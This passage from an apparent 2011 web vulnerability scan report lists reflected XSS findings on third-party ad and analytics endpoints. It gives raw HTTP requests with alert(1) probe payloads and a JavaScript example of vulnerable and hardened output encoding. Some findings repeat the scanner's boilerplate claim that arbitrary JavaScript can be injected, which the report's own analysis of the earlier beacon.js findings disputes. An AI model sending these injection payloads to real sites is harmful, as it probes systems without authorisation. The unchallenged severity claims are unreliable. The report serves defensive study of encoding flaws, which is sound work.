document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/matchbba35';alert(1)//26ade494141?admeld_adprovider_id=73&external_user_id=3449391312096071132"/>');

4.33. http://api.bing.com/qsonhs.aspx [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bing.com
Path:   /qsonhs.aspx

Issue detail

The value of the q request parameter is echoed, with < and > left unencoded, inside the Query string of a JSON response (Content-Type: application/json; charset=utf-8). The payload f4d2c<img%20src%3da%20onerror%3dalert(1)>ad5e9767223 was submitted in the q parameter and echoed as f4d2c<img src=a onerror=alert(1)>ad5e9767223. The scanner's classification, plain text between tags, is its generic label for unencoded HTML metacharacters; there are no tags in this response.

What the PoC actually shows is that an event handler in the query is returned verbatim. A browser that honours the Content-Type does not render application/json as a document, so opening this URL does not run the payload. It becomes executable only if a consumer inserts AS.Query into a page as HTML (innerHTML rather than textContent), which is DOM-based XSS on the consuming page, or if a browser sniffs the response into HTML (no X-Content-Type-Options: nosniff header is sent). Rate it accordingly, and fix it at the source by escaping < and > as \u003c and \u003e in the JSON output.

Request

GET /qsonhs.aspx?FORM=ASAPIV&q=f4d2c<img%20src%3da%20onerror%3dalert(1)>ad5e9767223 HTTP/1.1
Host: api.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/search?q='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3ehoyt(0x006623)%3c%2fscript%3e%4E%45%57%53%46%4C%41%53%48%3A%20%4D%53%46%54%20%73%65%6C%6C%73%20%74%6F%20%41%50%50%4C%20%61%6E%64%20%47%4F%4F%47%20%69%6E%20%66%69%72%65%73%61%6C%65%20%6C%69%71%75%69%64%61%74%69%6F%6E%2E&FORM=O1FD
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110514; _UR=OMW=1; s_nr=1306591010561; _msaId=d8678782_61_15534038; _FP=; _HOP=; _SS=SID=7E86734B014B497982A1A3998AE3B12B&CW=1065&CH=723&bIm=510; RMS=F=GgAg&A=AAAAAAAAAAAQAAAk; MUID=E361C23374E642C998D8ABA7166A75EC; OrigMUID=E361C23374E642C998D8ABA7166A75EC%2cc751fa2acb014433bae3e06d300eae0d; SRCHD=MS=1865664&SM=1&D=1769857&AF=BMMENO

Response

HTTP/1.1 200 OK
Content-Length: 79
Content-Type: application/json; charset=utf-8
X-Akamai-TestID: af1b3ddfac804d0092ef7cc9392fca85
Date: Tue, 19 Jul 2011 14:28:18 GMT
Connection: close

{"AS":{"Query":"f4d2c<img src=a onerror=alert(1)>ad5e9767223","FullResults":1}}

4.34. http://api.choicestream.com/instr/api/8e360375d27a5381/a1 [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.choicestream.com
Path:   /instr/api/8e360375d27a5381/a1

Issue detail

The value of the callback request parameter is used, unvalidated, as the function name at the start of this JSONP response (Content-Type: text/javascript). The payload 2a4f9<script>alert(1)</script>ecd36545afc was appended to csAny.Transport.callback and echoed unmodified.

Note what that means in the path the endpoint is designed for, a script tag: the reflected text is JavaScript source, not HTML, and callback2a4f9<script>alert(1)</script>ecd36545afc('0',{...}) is not valid JavaScript (the /script>... part is read as an unterminated regular expression), so this particular payload does not execute there. It executes only if the response is rendered as HTML, that is, by a browser that sniffs a text/javascript response into a document when the URL is opened directly; no X-Content-Type-Options: nosniff header is sent. The underlying defect is the unrestricted callback name: a JSONP endpoint should accept only an identifier (a dotted one such as csAny.Transport.callback if the client needs it) and reject everything else, and the JSON it wraps should have < and > escaped.

Request

GET /instr/api/8e360375d27a5381/a1?protocol=ScriptInclude&callback=csAny.Transport.callback2a4f9<script>alert(1)</script>ecd36545afc&request_id=0&json_id=a0b60e38bae29543e86fa96644275bba&json=%7B%22discoveries%22%3A%5B%5D%2C%0A%22activities%22%3A%5B%7B%22type%22%3A%22item_views%22%2C%0A%22attrs%22%3A%7B%22item_id%22%3A%22event_000043582C516D43%22%7D%7D%5D%2C%0A%22get_recos%22%3A%5B%5D%2C%0A%22context%22%3A%7B%22appcontext%22%3A%22tm_event_on_sale%22%2C%0A%22api_key%22%3A%228e360375d27a5381%22%2C%0A%22cookie_id%22%3A%2223fe7a5564101842925261f744f3ff01%22%7D%2C%0A%22transport%22%3A%7B%22endpoint%22%3A%22http%3A%2F%2Fapi.choicestream.com%2Finstr%2Fapi%22%7D%2C%0A%22__cs_rr%22%3A%221%22%7D&_=1311100563081 HTTP/1.1
Host: api.choicestream.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CSAnywhere=823c0d1c-2cc2-444c-b394-ea0d63b3dc5e

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-CS-Request-Id: 72db13ee-64b3-4cd9-915b-53b66435f1ec
P3P: policyref="http://www.choicestream.com/w3c/p3p.xml",CP="NOI DSP COR NID ADMa DEVa PSAo PSDo OUR STP"
Last-Modified: Tue, 19 Jul 2011 18:36:15 GMT
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 122
Cache-Control: private
Content-Length: 122
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 18:36:35 GMT
Connection: close
Set-Cookie: __cs_sp=1; Domain=.choicestream.com; Expires=Wed, 18-Jul-2012 18:36:15 GMT; Path=/
Set-Cookie: CSAnywhere=823c0d1c-2cc2-444c-b394-ea0d63b3dc5e; Domain=.choicestream.com; Expires=Wed, 18-Jul-2012 18:36:15 GMT; Path=/

csAny.Transport.callback2a4f9<script>alert(1)</script>ecd36545afc('0',{"status":{"message":"OK","code":0},"reco_sets":[]})
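Hardened versions of the three output contexts reported in 4.26 through 4.34, as an added example that is not code from any of the scanned services: a value placed in a JavaScript string literal (4.26, 4.29 to 4.32), a URL placed in a double-quoted HTML attribute (4.27, 4.28), and a JSONP callback name (4.34). The function names, the sample inputs (the report's own payloads, constructed here as literals) and the assumption that the responses are built server-side by string concatenation in Node.js are illustrative; the vulnerable shapes reproduce only the one line of each response that matters.

```javascript
// Added example (not the scanned services' code): the three reflection
// contexts from findings 4.26-4.34, each in the vulnerable shape the
// responses show and then in a hardened form. Function names and sample
// inputs are assumptions for illustration.

// Any JSON-serialisable value as a JavaScript literal that is safe to embed
// in a script: JSON.stringify handles quotes and backslashes; escaping < and >
// keeps a literal containing </script> harmless if the script is ever
// inlined in HTML; U+2028/U+2029 are line terminators in pre-ES2019 engines.
function jsLiteral(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// A value inside a double-quoted HTML attribute (the IFRAME SRC in 4.27/4.28).
function htmlAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, c => map[c]);
}

// A URL attribute needs validation as well as encoding: only absolute
// http(s) URLs are accepted, so javascript: and data: cannot be smuggled in.
function safeHttpUrl(value) {
  let u;
  try { u = new URL(String(value)); } catch (e) { return null; }
  return u.protocol === 'http:' || u.protocol === 'https:' ? u.href : null;
}

// A JSONP callback name (4.34): a dotted identifier such as
// csAny.Transport.callback, or the default. Nothing else is echoed.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;
function jsonpCallback(name, fallback = 'callback') {
  return CALLBACK_RE.test(String(name)) ? String(name) : fallback;
}

// --- Vulnerable shapes, reduced to the one line of each response that matters ---
function unsafeMatchPixel(adProviderId) {   // admeld.adnxs.com/usersync (4.29)
  return `document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=${adProviderId}" width="0" height="0"/>');`;
}
function unsafePassbackFrame(clickUrl) {     // a.netmng.com/hic/ (4.27)
  return `<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.NetMining/B5527925;sz=728x90;click=${clickUrl};?" WIDTH=728 HEIGHT=90>`;
}

// --- Hardened equivalents ---
function renderMatchPixel(adProviderId) {
  const url = 'http://tag.admeld.com/match?admeld_adprovider_id=' +
    encodeURIComponent(String(adProviderId));
  const html = `<img src="${htmlAttr(url)}" width="0" height="0"/>`; // attribute context
  return `document.write(${jsLiteral(html)});`;                         // script context
}
function renderPassbackFrame(clickUrl) {
  const click = safeHttpUrl(clickUrl);
  if (click === null) return null;            // refuse rather than emit a broken frame
  const src = 'http://ad.doubleclick.net/adi/N1558.NetMining/B5527925;sz=728x90;click=' +
    encodeURIComponent(click) + ';?';
  return `<IFRAME SRC="${htmlAttr(src)}" WIDTH=728 HEIGHT=90>`;
}
function renderJsonp(callbackName, requestId, payload) {
  return {
    headers: {
      'Content-Type': 'application/javascript; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',  // do not let a browser sniff this into HTML
    },
    body: `${jsonpCallback(callbackName)}(${jsLiteral(requestId)},${jsLiteral(payload)})`,
  };
}

// The report's own payloads (constructed copies) run through both shapes.
function demo() {
  const jsPayload = "19316176'-alert(1)-'789f99fe84a";                                  // 4.29
  const urlPayload = 'http://ads.undertone.com/c?oaparams=2__oadest=a9d54"><script>alert(1)</script>747b9ccc342'; // 4.27, shortened
  const cbPayload = 'csAny.Transport.callback2a4f9<script>alert(1)</script>ecd36545afc'; // 4.34
  return {
    before: { pixel: unsafeMatchPixel(jsPayload), frame: unsafePassbackFrame(urlPayload) },
    after: {
      pixel: renderMatchPixel(jsPayload),
      frame: renderPassbackFrame(urlPayload),
      jsonp: renderJsonp(cbPayload, '0', { status: { message: 'OK', code: 0 }, reco_sets: [] }),
    },
  };
}
```

In the hardened pixel the value is encoded twice, once for the attribute and once for the string literal, because the document.write argument is HTML that is itself inside JavaScript; getting only one of the two layers right is how the "unmodified" reflections above come about. The JSONP rendering rejects the scanner's callback outright instead of trying to escape it.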

4.35. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied, unencoded, into a double-quoted JavaScript string literal in the COMSCORE.beacon({...}) call at the end of this script response (Content-Type: application/x-javascript). The scanner's plain text between tags classification does not fit: the response contains no HTML. The payload 3b34b<script>alert(1)</script>bfb92715a68 was submitted in c1 and echoed unmodified.

Inside a string literal, however, a script tag is inert, and nothing in this payload leaves the literal, so the PoC does not demonstrate execution. It shows that HTML metacharacters are not encoded; whether JavaScript can be injected depends on how a double quote or backslash in c1 is handled, which this test did not probe. Treat the finding as unverified until that is checked. The reflected </script> would only matter if a publisher inlined this response instead of loading it through a src attribute.

Request

GET /beacon.js?c1=83b34b<script>alert(1)</script>bfb92715a68&c2=2113&c3=37&c4=16565&c5=28159&c6=&c10=174266&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Jul 2011 20:42:57 GMT
Date: Tue, 19 Jul 2011 20:42:57 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"83b34b<script>alert(1)</script>bfb92715a68", c2:"2113", c3:"37", c4:"16565", c5:"28159", c6:"", c10:"174266", c15:"", c16:"", r:""});



4.36. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter lands, unencoded, inside a double-quoted JavaScript string literal in the COMSCORE.beacon({...}) call that closes this application/x-javascript response; there are no HTML tags here, whatever the scanner's plain text between tags label suggests. The payload 47da7<script>alert(1)</script>399492637bb was submitted in c10 and echoed unmodified.

As with the other beacon.js parameters, the payload never leaves the string literal, so no JavaScript runs; the PoC establishes only that < and > are not encoded. A double quote or backslash in c10 is the test that would settle whether this is an injectable script context, and it was not sent.

Request

GET /beacon.js?c1=8&c2=2113&c3=37&c4=16565&c5=28159&c6=&c10=17426647da7<script>alert(1)</script>399492637bb&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Jul 2011 20:43:01 GMT
Date: Tue, 19 Jul 2011 20:43:01 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
h-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"37", c4:"16565", c5:"28159", c6:"", c10:"17426647da7<script>alert(1)</script>399492637bb", c15:"", c16:"", r:""});



4.37. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter, empty in normal use, is copied unencoded into the double-quoted string literal for c15 in the COMSCORE.beacon({...}) call at the end of this application/x-javascript response. The scanner's plain text between tags label is misleading: the response is a script, not HTML. The payload e0738<script>alert(1)</script>71db0b72094 was submitted in c15 and echoed unmodified.

Because the payload stays inside the string literal, nothing executes; the PoC shows only that < and > are passed through. Confirming an injectable script context needs a double quote or backslash in c15, which this test did not send, so the finding is unverified as it stands.

Request

GET /beacon.js?c1=8&c2=2113&c3=37&c4=16565&c5=28159&c6=&c10=174266&c15=e0738<script>alert(1)</script>71db0b72094 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Jul 2011 20:43:03 GMT
Date: Tue, 19 Jul 2011 20:43:03 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"37", c4:"16565", c5:"28159", c6:"", c10:"174266", c15:"e0738<script>alert(1)</script>71db0b72094", c16:"", r:""});



4.38. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied, unencoded, into a double-quoted JavaScript string literal in the COMSCORE.beacon({...}) call that ends this application/x-javascript response; the scanner's plain text between tags classification does not describe a script response with no HTML in it. The payload 339fa<script>alert(1)</script>4092f63da71 was appended to the legitimate value 2113 and echoed unmodified.

A script tag inside a string literal is inert and this payload never leaves the literal, so no JavaScript executes. What is established is that HTML metacharacters are not encoded; whether a double quote or backslash in c2 would end the literal was not probed, so treat this as unverified.

Request

GET /beacon.js?c1=8&c2=2113339fa<script>alert(1)</script>4092f63da71&c3=37&c4=16565&c5=28159&c6=&c10=174266&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Jul 2011 20:42:58 GMT
Date: Tue, 19 Jul 2011 20:42:58 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113339fa<script>alert(1)</script>4092f63da71", c3:"37", c4:"16565", c5:"28159", c6:"", c10:"174266", c15:"", c16:"", r:""});



4.39. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied, unencoded, into a double-quoted JavaScript string literal in the COMSCORE.beacon({...}) call that ends this application/x-javascript response. There are no HTML tags in the response, so the scanner's plain text between tags label does not apply. The payload d6c50<script>alert(1)</script>bbe75eec2e7 was appended to the legitimate value 37 and echoed unmodified.

Inside the string literal the payload is data, not code, and nothing in it ends the literal, so the PoC does not demonstrate execution. It shows that < and > are not encoded; sending a double quote or backslash in c3 is what would show whether the script context is injectable, and that was not done here.

Request

GET /beacon.js?c1=8&c2=2113&c3=37d6c50<script>alert(1)</script>bbe75eec2e7&c4=16565&c5=28159&c6=&c10=174266&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Jul 2011 20:42:59 GMT
Date: Tue, 19 Jul 2011 20:42:59 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"37d6c50<script>alert(1)</script>bbe75eec2e7", c4:"16565", c5:"28159", c6:"", c10:"174266", c15:"", c16:"", r:""});



4.40. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 35e59<script>alert(1)</script>27cddba7723 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=37&c4=1656535e59<script>alert(1)</script>27cddba7723&c5=28159&c6=&c10=174266&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Jul 2011 20:42:59 GMT
Date: Tue, 19 Jul 2011 20:42:59 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
,f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"37", c4:"1656535e59<script>alert(1)</script>27cddba7723", c5:"28159", c6:"", c10:"174266", c15:"", c16:"", r:""});



4.41. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 23c60<script>alert(1)</script>d682f2287ec was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=37&c4=16565&c5=2815923c60<script>alert(1)</script>d682f2287ec&c6=&c10=174266&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Jul 2011 20:43:00 GMT
Date: Tue, 19 Jul 2011 20:43:00 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
omscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"37", c4:"16565", c5:"2815923c60<script>alert(1)</script>d682f2287ec", c6:"", c10:"174266", c15:"", c16:"", r:""});



4.42. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload e35be<script>alert(1)</script>6f8f21388b6 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=37&c4=16565&c5=28159&c6=e35be<script>alert(1)</script>6f8f21388b6&c10=174266&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Jul 2011 20:43:01 GMT
Date: Tue, 19 Jul 2011 20:43:01 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"37", c4:"16565", c5:"28159", c6:"e35be<script>alert(1)</script>6f8f21388b6", c10:"174266", c15:"", c16:"", r:""});



4.43. http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73600"><script>alert(1)</script>cf1843363ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Ticketmaster73600"><script>alert(1)</script>cf1843363ea/LN/RTG_SX_NonSecure@Bottom3 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 361
